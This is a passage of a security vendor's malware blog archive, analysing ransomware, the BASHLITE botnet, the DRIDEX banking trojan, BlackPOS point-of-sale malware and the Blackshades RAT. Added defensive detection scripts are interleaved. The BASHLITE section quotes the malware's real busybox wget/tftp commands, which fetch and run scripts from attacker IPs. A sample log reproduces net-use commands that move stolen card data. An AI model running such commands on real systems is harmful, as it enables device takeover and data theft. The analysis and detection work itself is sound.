TrendLabs Malware Blog - Trend Micro
    Author Archive - Rhena Inocencio (Threat Response Engineer)

    We have continuously monitored crypto-ransomware’s modifications and evolution since its discovery in late 2013. Though crypto-ransomware is still relatively “new” to the threat landscape, it has already established itself as a formidable threat to unsuspecting users. By definition, crypto-ransomware shares similar routines with CryptoLocker, a refinement of ransomware with file-encryption capabilities.

    We recently came across two variants of crypto-ransomware, each with a routine or feature not found in other variants. The discovery of these two variants shows that crypto-ransomware is still evolving—all to victimize users.

    The Newly Minted Threat, CoinVault

    CoinVault, or TROJ_CRYPTCOIN.AK, stands out from other variants because it offers users a rare opportunity: the chance to save one encrypted file. The malware enters systems via automatic download from malicious websites or an infected flash drive. Once inside the system, CoinVault is able to gather information, connect to certain websites, and encrypt files.

    After encrypting files in an infected system, CoinVault displays a message telling the user that they can select one file to be decrypted, free of charge.

    Figure 1. Images displayed by CoinVault in the infected system

    Figure 2. (L): TROJ_CRYPTCOIN.AK or CoinVault ransom message,
    (R) TROJ_CRITOLOCK.A ransom message


    Posted in Malware | Comments Off on CoinVault Ransomware Jumps on Freemium Model

    When news of the Shellshock vulnerability broke at the end of September, we spotted several attacks that leveraged it, showing how widely, and how creatively, attackers used the exploit. For instance, attackers used Shellshock to target SMTP servers, launch botnet attacks, and even to download KAITEN source code, among other things.

    We have continuously monitored this vulnerability, and in our latest research we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scan the network for devices/machines running BusyBox and log in using a set of usernames and passwords (see Figure 4 below). Once a connection is established, the malware runs commands to download and run shell scripts, gaining control over the BusyBox system.

    BusyBox is a userland utility suite that runs on top of the Linux kernel and is used by small devices such as routers. Remote attackers can extend their control over affected devices by deploying other components or malicious software onto the system, depending on their motive. This is seen in the following commands:

    cd /tmp
    busybox wget http://69[.]163[.]37[.]115/.niggers/
    busybox tftp -r -g 69[.1]63[.]37[.]115
    echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74’\r\n

    cd /tmp/
    busybox wget http://176[.]10[.]250[.]37/.niggers/
    busybox tftp -r -g 176[.]10[.]250[.]37
    echo -e ‘\\x62\\x69\\x6e\\x66\\x61\\x67\\x74’\r\n

    These commands let the malware do the following on the affected devices:

    1. Change to the temporary folder, where there is generally file write access.
    2. Download a remote file, depending on whether the shell script is hosted via HTTP or TFTP. There is a ‘fail-safe’ mechanism for the download routine: if the first command does not result in any file being executed, the malware tries again to connect to the URL and download the file.
    3. Run the downloaded shell script.
    4. Perform the earlier “fingerprinting” routine to check whether the device runs BusyBox.
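    The four-step sequence above is also a usable detection signature on the defender's side. The following is an added example, not code from the original post or from Trend Micro, that scans a captured telnet/honeypot session transcript for the same chain (change to /tmp, fetch via busybox wget or tftp, then the hex-encoded echo fingerprint) and reports per session which stages were seen. The transcript format (session id, direction marker, text), the sample lines and the RFC 5737 placeholder address are all constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample transcript (not from the original post). Each line is
# "<session-id> <direction> <text>", with "C>" marking client input. Session
# s1 shows the BASHLITE-style chain; s2 is benign interactive use.
SAMPLE_SESSION = r"""s1 C> root
s1 C> admin
s1 S> #
s1 C> cd /tmp
s1 C> busybox wget http://192.0.2.10/x/
s1 C> busybox tftp -r -g 192.0.2.10
s1 C> echo -e '\x62\x69\x6e\x66\x61\x67\x74'
s2 C> cd /tmp
s2 C> ls
s2 C> busybox echo hello
"""

CD_TMP = re.compile(r"^cd\s+/tmp/?\s*$")
# busybox wget/tftp followed (somewhere on the line) by an IPv4 literal.
BB_FETCH = re.compile(
    r"^busybox\s+(wget|tftp)\b.*?(?:https?://)?([0-9]{1,3}(?:\.[0-9]{1,3}){3})")
# echo -e with a run of \xNN escapes; accepts one or two backslashes per escape.
HEX_ECHO = re.compile(r"^echo\s+-e\s+['\"]?((?:\\\\?x[0-9a-fA-F]{2})+)")


def decode_hex_echo(arg):
    """Turn the \\xNN escapes of an echo -e argument into the printable string."""
    pairs = re.findall(r"x([0-9a-fA-F]{2})", arg)
    return bytes(int(h, 16) for h in pairs).decode("ascii", "replace")


def analyze_sessions(transcript):
    """Return {session_id: finding} for sessions that fetch via busybox.

    score: 1 for the download stage, +1 if preceded by cd /tmp, +1 if the
    hex echo fingerprint is present (max 3).
    """
    stages = defaultdict(lambda: {"cd_tmp": False, "fetch_hosts": set(),
                                  "fingerprint": None})
    for line in transcript.splitlines():
        parts = line.split(" ", 2)
        if len(parts) < 3 or parts[1] != "C>":
            continue                       # only client-typed commands matter
        sid, cmd = parts[0], parts[2].strip()
        st = stages[sid]
        if CD_TMP.match(cmd):
            st["cd_tmp"] = True
            continue
        m = BB_FETCH.match(cmd)
        if m:
            st["fetch_hosts"].add(m.group(2))
            continue
        m = HEX_ECHO.match(cmd)
        if m:
            st["fingerprint"] = decode_hex_echo(m.group(1))

    findings = {}
    for sid, st in stages.items():
        if not st["fetch_hosts"]:          # the download stage is mandatory
            continue
        score = 1 + int(st["cd_tmp"]) + int(st["fingerprint"] is not None)
        findings[sid] = {"score": score,
                         "hosts": sorted(st["fetch_hosts"]),
                         "fingerprint": st["fingerprint"]}
    return findings


if __name__ == "__main__":
    for sid, f in analyze_sessions(SAMPLE_SESSION).items():
        print(sid, f)
```

    The download hosts collected per session are the values worth feeding into blocklists or firewall logs, and the decoded fingerprint string makes it easy to match a session against the strings reported for a given sample.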

    Figure 1. Code snippets of BASHLITE downloading files via BusyBox

    The previous BASHLITE sample (detected as ELF_BASHLITE.A) used BusyBox only to echo the string ‘gayfgt’ when the remote malicious user invoked the command SCANNER ON:

    Figure 2. Scanner mode ‘ON’

    Figure 3. Code snippet of ELF_BASHLITE.A where the string, ‘gayfgt’ is represented in octal form

    This was done only to check whether the device runs BusyBox; it did not execute any further commands (unlike the new samples). BASHLITE attempts to log into remote systems using the following default set of usernames and passwords:

    Figure 4. Set of usernames and passwords

    User Impact and Countermeasures

    Devices running BusyBox may be affected by BASHLITE. A remote attacker can then issue commands on the devices or download other files onto them, compromising their security. Since the initial discovery of the Shellshock vulnerability, Trend Micro has provided protection via Deep Security rules and the Smart Protection Network, which detect the exploit and all related malware payloads.

    We strongly advise users to change the default usernames and passwords on these devices and to disable remote shell access where possible. For more information on the Shellshock vulnerability, you can read our Summary of Shellshock-Related Stories and Materials. Users can also get free protection from Shellshock via these tools.

    The following hashes are related to this threat:

    • ffaa3c714ae82f954089f49828dac795327bf26e
    • e51ad7cc8de05dc7991e591ee2f4eb53b8f05ae4
    • 82e47cdbedeef6812ea84549ffc2f385a03e57de
    • fd5c0f7575e6aa1f9cea5bb3977d6e037bfe6421

    With additional insights from Joseph Cepe

    Posted in Internet of Things, Malware, Vulnerabilities | Comments Off on BASHLITE Affects Devices Running on BusyBox

    Included in our predictions for the upcoming year is that more severe online banking and other financially-motivated threats will arise. It seems that we didn’t have to wait for 2015 to see proof of this prediction. We recently came across banking malware that features new techniques to cast a wider net for victims and avoid detection. This malware, known as DRIDEX, is being touted as the successor of the banking malware CRIDEX.

    The appearance of DRIDEX comes a couple of years after CRIDEX’s entry into the threat landscape. Both CRIDEX and DRIDEX steal personal information, specifically data related to online banking. DRIDEX is considered the successor because it uses a new way to steal information—via HTML injections.

    However, there is a major difference between the two. CRIDEX malware is one of the payloads associated with exploit kit spam attacks. DRIDEX, on the other hand, relies on spam to deliver Microsoft Word documents containing malicious macro code. The macro code downloads DRIDEX onto the affected system.

    The DRIDEX Infection Chain

    As mentioned, DRIDEX arrives via spammed messages. The messages, supposedly sent by legitimate companies, talk about matters related to finance. The attachments are often said to be invoices or accounting documents.

    Figure 1. Sample spammed message

    The attachment is a Word document containing the malicious macro code. Should the user open the document, they might see a blank document. We have seen other attachments stating that the content will not be visible unless the macro feature is enabled—which is disabled by default. Once this feature is enabled, the macro downloads DRIDEX malware, specifically TSPY_DRIDEX.WQJ, onto the computer.
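    Because the infection chain hinges on a macro-bearing attachment reaching the user, a gateway that can tell macro-carrying Office files from plain ones blocks the chain before any social engineering happens. The following is an added example, not code from the original post or from Trend Micro, that classifies an attachment by its container: for the OOXML zip format it looks for a vbaProject.bin part, and for the legacy OLE2 format used by .doc files it applies a heuristic, searching the raw bytes for the UTF-16LE storage names (Macros, _VBA_PROJECT) under which Word stores a VBA project. The sample files are constructed in memory with the standard library and are not real Word documents; the triage function and its quarantine policy are this example's own.

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# OLE directory entries hold stream/storage names as UTF-16LE. A VBA project
# in a legacy .doc lives in the "Macros" storage with a "_VBA_PROJECT" stream,
# so these names are a cheap (heuristic) macro indicator without a full OLE parser.
OLE_MACRO_MARKERS = ["Macros".encode("utf-16-le"),
                     "_VBA_PROJECT".encode("utf-16-le")]


def has_macros(data: bytes) -> bool:
    """Return True if an Office attachment appears to carry a VBA project."""
    if data.startswith(OLE_MAGIC):                       # legacy .doc/.xls/.ppt
        return any(marker in data for marker in OLE_MACRO_MARKERS)
    if data.startswith(b"PK"):                           # OOXML zip container
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                return any(n.lower().endswith("vbaproject.bin")
                           for n in zf.namelist())
        except zipfile.BadZipFile:
            return False
    return False


def triage_attachments(attachments):
    """Given [(filename, bytes)], return the filenames to quarantine."""
    return [name for name, data in attachments if has_macros(data)]


# --- constructed samples for demonstration (not real Word files) -------------
def build_sample_docm(with_macro: bool) -> bytes:
    """Minimal OOXML-style zip, optionally containing a vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    return buf.getvalue()


def build_sample_ole(with_macro: bool) -> bytes:
    """OLE magic plus padding, optionally with a UTF-16LE 'Macros' storage name."""
    body = OLE_MAGIC + b"\x00" * 504
    if with_macro:
        body += "Macros".encode("utf-16-le") + b"\x00" * 64
    return body


if __name__ == "__main__":
    mail = [("invoice.doc", build_sample_ole(True)),
            ("notes.docx", build_sample_docm(False)),
            ("report.docm", build_sample_docm(True))]
    print("quarantine:", triage_attachments(mail))
```

    The OLE heuristic can be fooled by a document whose body text happens to contain those names, so in production it should gate a deeper parse (an OLE library that walks the directory tree) rather than be the final verdict; the OOXML check, by contrast, is exact because the VBA project can only live in that part.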

    Figure 2. Malicious attachment instructing users to enable the macro feature

    Once executed, the malware then monitors for activity related to online banking. Its configuration file contains a list of banks, most of which are based in Europe. Some of the targeted banks include:

    • Bank of Scotland
    • Lloyds Bank
    • Danske Bank
    • Barclays
    • Kasikorn Bank
    • Santander
    • Triodos Bank

    It then performs information theft through methods like form grabbing, screenshots, and site injections.

    Macros Versus Exploit Kits

    The use of macros is a marked departure from CRIDEX’s infection chain, which relies on the Blackhole Exploit Kit.  The move to macros could be seen as one way of ensuring a higher chance of successful attacks.

    Attacks using exploit kits rely on vulnerabilities in order to be successful. If the affected system is not vulnerable, the attack will not be successful. Meanwhile, macros are commonly used in automated and interactive documents. If the macro feature was already enabled prior to the attack, the attack commences without any additional requirements. Otherwise, the attack must use a strong social engineering lure in order to convince the user to enable the feature.

    The reliance on social engineering could be seen as one advantage of macro spam. In exploit kit spam, if the system is no longer vulnerable, the possibility of a successful attack dwindles to nothing, even if the user was tricked into clicking the malicious link. In a macro spam attack, there is always the possibility that the user will be tricked into enabling the macro feature.

    The use of macros also poses challenges for detection because of the insertion of garbage/useless code.

    Figure 3. Garbage code found in DRIDEX malware

    Affected Countries

    Based on feedback from the Smart Protection Network, users from Australia are the most affected by DRIDEX, followed by users in the U.K. and the U.S.

    Figure 4. Top affected countries, based on data from September-October 2014

    We traced the spam sending to several countries. The top ten spam sending countries include Vietnam, India, Taiwan, Korea, and China.

    Figure 5. Top DRIDEX spam sending countries

    Best Practices

    Macro-based attacks were popular in the early 2000s, but they appear to be experiencing a revival these days. This just shows that “newer” attacks can come in the form of old techniques, which can be successful especially if victims are not aware of these older techniques. For macro-based attacks, it’s best to make sure the macro security features in Office applications are enabled. For organizations, IT administrators can enforce such security measures via Group Policy settings.

    It might be tempting to open emails that are related to finances but users should avoid opening such emails until they can confirm the legitimacy of the email. These attacks rely on social engineering for success so exercising some caution can mean the difference between protection and infection.

    Trend Micro, through the Smart Protection Network, protects users from all threats related to this attack. Our Web Reputation Service, which tracks the credibility and safety of web domains, blocks access to malicious URLs. The Email Reputation Service scans emails and blocks those that contain spam-like and malicious content, including links and attachments. Meanwhile, our File Reputation Service checks the reputation of files against our database and flags those that contain malicious and suspicious behavior.

    The following are the related hashes for the said attack:

    DRIDEX malware:

    • C2C980297D985C0E62E461B76FA584E79A6B3822
    • 4DAD1A0E024CCE9C3A11622B5E5BBE3EFBEFC4B9
    • CBD005DB36EFBDF3AEED5D26FAD54554CD734DA4
    • BDC7C47001852A8E915F29EAEBCF99FFA857C3B5
    • B4F4B426457124ECFEEC4D5B59B9C2A6C25BAAF7
    • B54B06E01C6F735E98D17B156EE8C7A2437B2D68
    • BF1FCA6F81B3D5A9054CEAB9A56C58F248560B34

    Malicious .DOC files:

    • A7B1A30386928E6320C31279B3473610E0E96192
    • 01EEB1DEBB21DC8933E7B6C1280F7E3F87A88DD0
    • 0F9C49E08683B811A6C713AFC1A37B3A33F58FD8
    • F3A65B6828BEE8DA06DAEB1619B9F1265C4C38C7
    • AE6FE7D7E80D7271B902A482D1ECE2A73F082EBA
    • 46FF15B415407BABB60BECC19D259752C2BE77CD
    • 911A77E67ABABC355A2AA169149DE88480AB1768
    • 7714F4D42C7B1608BE281CB288C07BAF8FF35501

    With additional insight from Joie Salvio.

    Posted in Malware | Comments Off on Banking Trojan DRIDEX Uses Macros for Infection

    We recently spotted a brand new BlackPOS (point-of-sale) malware, detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is that it disguises itself as an installed service of a known AV vendor’s software, to avoid being detected and consequently deleted on infected PoS systems. This routine is different from previous PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS), which employed the targeted company’s own installed service.

    The malware can be run with the options -[start|stop|install|uninstall]. The -install option installs the malware as a service named <AV_Company> Framework Management Instrumentation, and the -uninstall option deletes that service. The RAM scraping routine begins as a thread when the installed service starts. It only starts its main routine if it has successfully been registered as a service.

    Apart from masquerading as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses the CreateToolhelp32Snapshot API call to list and iterate over all running processes, whereas BlackPOS variants typically use the EnumProcesses API call for this.

    It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip.

    The data is eventually written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retailer Target in December 2013.



    Figure 1. CreateToolhelp32Snapshot to enumerate processes

    Based on our analysis, this PoS malware uses a new custom search routine to check the RAM for Track data. These custom search routines have replaced the regex search in newer PoS malware. It reads 0x20000 (hexadecimal) bytes in each pass, and continues scanning until it has covered the entire memory region of the process being inspected.


    Figure 2. Screenshot of reading process memory


    Figure 3. Logging of data

    It has an exclusion list that serves to skip certain processes where track data is not expected to be found. It gathers track data by scanning the memory of all running processes except for the following:

    • smss.exe
    • csrss.exe
    • wininit.exe
    • services.exe
    • lsass.exe
    • svchost.exe
    • winlogon.exe
    • sched.exe
    • spoolsv.exe
    • System
    • conhost.exe
    • ctfmon.exe
    • wmiprvse.exe
    • mdm.exe
    • taskmgr.exe
    • explorer.exe
    • RegSrvc.exe
    • firefox.exe
    • chrome.exe

    This skipping of scanning specific processes is similar to VSkimmer (detected as BKDR_HESETOX.CC).

    In TSPY_MEMLOG.A, the credit card Track data grabbed from memory is saved into a file, McTrayErrorLogging.dll, and sent to a shared location within the same network. We’ve seen this routine in another BlackPOS/Kaptoxa variant detected as TSPY_POCARDL.AB. The only difference is that TSPY_MEMLOG.A uses a batch file for moving the gathered data within the shared network, while TSPY_POCARDL.AB executes the net command via cmd.exe. It is highly possible that the server is compromised, since the malware uses a specific username for logging into the domain.

    Data Exfiltration Mechanism

    The malware drops the component t.bat which is responsible for transferring the data from McTrayErrorLogging.dll to a specific location in the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe. It uses the following command to transfer the gathered data:


    Figure 4. Screenshot of command used to transfer data

    The “net use” command is used to connect from one machine to another machine’s drive. The malware uses a specific username to log in to the host shown above (an IP address) and maps that machine’s drive D as device t:.

    In one of the biggest data breaches we saw in 2013, the cybercriminals behind it first offloaded the gathered data to a compromised server, while a different piece of malware running on that server uploaded it to an FTP server. We surmise that this new BlackPOS malware uses the same exfiltration tactic.
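    The exfiltration chain described above (a drive mapped with explicit credentials, then a file moved onto it under a different name) is visible in process-creation logs, and the two steps are more telling together than apart. The following is an added example, not code from the original post or from Trend Micro, of detection logic that reads command-line events, remembers which drive letters each host mapped with net use, and flags file operations that land on a mapped drive or UNC path, escalating when the file's extension changes in transit. The log format, the host and user names, the credential placeholder and the RFC 5737 address are constructed for this example; the file names and destination path are the ones reported in the post.

```python
import re
from collections import defaultdict

# Constructed sample of process-creation events (not from the original post):
# "<time> host=<host> user=<user> cmd=<command line>". POS-07 shows the
# exfiltration chain; WS-12 is an ordinary user copying a document to a share.
SAMPLE_EVENTS = r"""2014-09-01T10:00:01 host=POS-07 user=SYSTEM cmd=C:\Windows\System32\cmd.exe /c t.bat
2014-09-01T10:00:02 host=POS-07 user=SYSTEM cmd=net use t: \\192.0.2.25\d$ /user:CORP\svc_pos PLACEHOLDER_PW
2014-09-01T10:00:03 host=POS-07 user=SYSTEM cmd=cmd.exe /c move C:\Windows\System32\McTrayErrorLogging.dll t:\temp\dotnet\NDP45-KB2737084-x86.exe
2014-09-01T10:05:00 host=WS-12 user=alice cmd=net use p: \\fileserver\projects
2014-09-01T10:06:00 host=WS-12 user=alice cmd=copy C:\Users\alice\report.docx p:\shared\report.docx
"""

EVENT_RE = re.compile(r"^(\S+)\s+host=(\S+)\s+user=(\S+)\s+cmd=(.+)$")
# net use <letter>: \\server\share [options]
NET_USE_RE = re.compile(r"^net\s+use\s+([a-z]):\s+(\\\\\S+)(.*)$", re.I)
# [cmd /c] copy|move|xcopy <src> <dst>
FILE_OP_RE = re.compile(
    r"^(?:cmd(?:\.exe)?\s+/c\s+)?(?:copy|move|xcopy)\s+(\S+)\s+(\S+)", re.I)


def _ext(path):
    """Lower-cased extension of the last path component ('' if none)."""
    name = path.rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_exfil(events_text):
    """Return (findings, hosts) where hosts showed both chain stages.

    findings: list of dicts with host, time, rule and detail, in log order.
    """
    mapped = defaultdict(set)      # host -> drive letters mapped in this log
    findings = []
    for line in events_text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        ts, host, user, cmd = m.groups()

        nu = NET_USE_RE.match(cmd)
        if nu:
            drive, unc, rest = nu.groups()
            mapped[host].add(drive.lower())
            if "/user:" in rest.lower():   # explicit credentials on the command line
                findings.append({"host": host, "time": ts,
                                 "rule": "net_use_explicit_creds",
                                 "detail": f"{drive}: -> {unc} as {user}"})
            continue

        fo = FILE_OP_RE.match(cmd)
        if fo:
            src, dst = fo.groups()
            remote = dst.startswith("\\\\") or (
                dst[1:2] == ":" and dst[0].lower() in mapped[host])
            if not remote:
                continue
            rule = ("file_to_share_ext_mismatch" if _ext(src) != _ext(dst)
                    else "file_to_share")
            findings.append({"host": host, "time": ts, "rule": rule,
                             "detail": f"{src} -> {dst}"})

    creds = {f["host"] for f in findings if f["rule"] == "net_use_explicit_creds"}
    renamed = {f["host"] for f in findings
               if f["rule"] == "file_to_share_ext_mismatch"}
    return findings, sorted(creds & renamed)


if __name__ == "__main__":
    found, chain_hosts = detect_exfil(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("hosts with full chain:", chain_hosts)
```

    The per-host drive map is what keeps the benign copy on WS-12 at low severity: it reaches a share, but with no explicit credentials and no rename, so only POS-07 surfaces as a full chain. On PoS hosts, where interactive net use should be rare to begin with, the first rule alone is usually worth an alert.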


    PoS malware can possibly arrive on the affected network via the following means:

    • Targeting specific servers as a point of entry, followed by lateral movement
    • Hijacking network communication
    • Infecting machines before deployment

    As such, we recommend that enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities in systems and applications, as these may be used to infiltrate the network. In addition, check whether system components have been modified or changed, as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine whether their network has already been compromised by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

    Trend Micro protects enterprises from threats like PoS malware by detecting the malicious file.

    The related hash to this threat is b57c5b49dab6bbd9f4c464d396414685.

    With additional analysis from Numaan Huq

    Update as of 9:44 AM, September 8, 2014

    During the course of our investigation, we spotted the following anti-American messages embedded in the binary:


    Figure 5. Screenshot of the messages embedded in the binary


    Note that these strings are not used anywhere in the code, and we surmise that they may be a kind of signature left by the group developing this malware.

    Update as of 2:27 PM, September 11, 2014

    Even though BlackPOS ver2 has an entirely different code compared to the BlackPOS which compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call this BlackPOS ver2.

    It is also being reported in the press that some security vendors call this malware “FrameworkPOS.” This is a play on the service name <AV_Company> Framework Management Instrumentation under which the malware installs itself.

    Posted in Malware | Comments Off on New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts

    Earlier this week the US government announced the arrest of more than 100 individuals linked to the Blackshades remote access Trojan (RAT). While most of those arrested were merely users of this RAT, the arrests included its co-creator, a 24-year-old Swede named Alex Yücel. Also arrested was a 23-year-old American named Brendan Johnston, who was involved in marketing the RAT to various hacker forums and provided support to “customers”.

    Blackshades was sold as a toolkit, which was used to create the actual malware, detected as WORM_SWISYN.SM. The actual capabilities of the malware itself are fairly similar to other RATs: it can steal keystrokes and passwords, launch denial-of-service attacks, and download and run malware onto the affected system. It can also be configured by the attacker to spread via USB drives, if desired.

    Blackshades, however, is particularly infamous for being used by would-be stalkers and other such unsavory elements to spy on women. Blackshades allows the remote attacker to turn on the victim PC’s microphone and/or webcam. It’s not the first malware family to include this behavior, but it appears to be one of Blackshades’ most commonly used “features”.


    Figure 1. The Blackshades remote access trojan’s UI

    The scale of the arrests—rarely have so many cybercriminals been arrested in one go—is entirely due to Blackshades’ ease of use. It was easy to acquire; it had its own easily accessible website with its own domain (now seized by the FBI).

    There were relatively few barriers to entry—in contrast with, say, the Russian underground, where it is not always easy to earn the trust of would-be sellers of malware. The damage the users of Blackshades caused was real, but that was not necessarily because they were particularly skillful.

    This was both good and bad. The relative lack of skill (and caution) by Blackshades users not only meant that law enforcement was able to apprehend them, but it also means that the barriers to entry are sufficiently low that anyone can now be a cybercriminal should one want to do so.

    This case should serve as a warning to all would-be low-level cybercriminals: law enforcement has the capability and willingness to go after cybercriminals of all capabilities and skill levels, and you are not too far from the long arm of the law.

    Trend Micro protects users from this threat by detecting the created RATs, as well as blocking the main site that sold Blackshades.


    Posted in Malware | Comments Off on The Blackshades RAT – Entry-Level Cybercrime


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice